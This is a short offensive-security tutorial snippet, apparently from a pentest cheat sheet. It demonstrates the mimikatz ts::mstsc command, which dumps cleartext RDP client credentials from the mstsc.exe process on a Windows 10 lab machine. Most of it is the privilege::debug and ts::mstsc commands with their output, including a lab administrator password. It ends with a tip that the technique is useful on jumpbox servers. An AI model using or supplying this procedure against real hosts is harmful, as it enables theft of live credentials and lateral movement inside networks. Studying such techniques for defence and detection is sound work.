ts::mstsc can be used to extract cleartext credentials from the mstsc process (client side)
mimikatz # privilege::debug
Privilege '20' OK
mimikatz # ts::mstsc
!!! Warning: false positives can be listed !!!
| PID 2992 mstsc.exe (module @ 0x000000000055F6F0)
ServerName [wstring] ''
ServerFqdn [wstring] ''
UserSpecifiedServerName [wstring] ''
UserName [wstring] 'administrator'
Domain [wstring] 'hacklab'
Password [protect] 'Super_SecretPass1!'
SmartCardReaderName [wstring] ''
PasswordContainsSCardPin [ bool ] FALSE
ServerNameUsedForAuthentication [wstring] ''
RDmiUsername [wstring] 'hacklab\administrator'
It must be noted that an RDP session must be running in order to retrieve credentials via ts::mstsc. It comes in handy in jumpbox servers!
(Demonstration target is a Windows 10 Pro)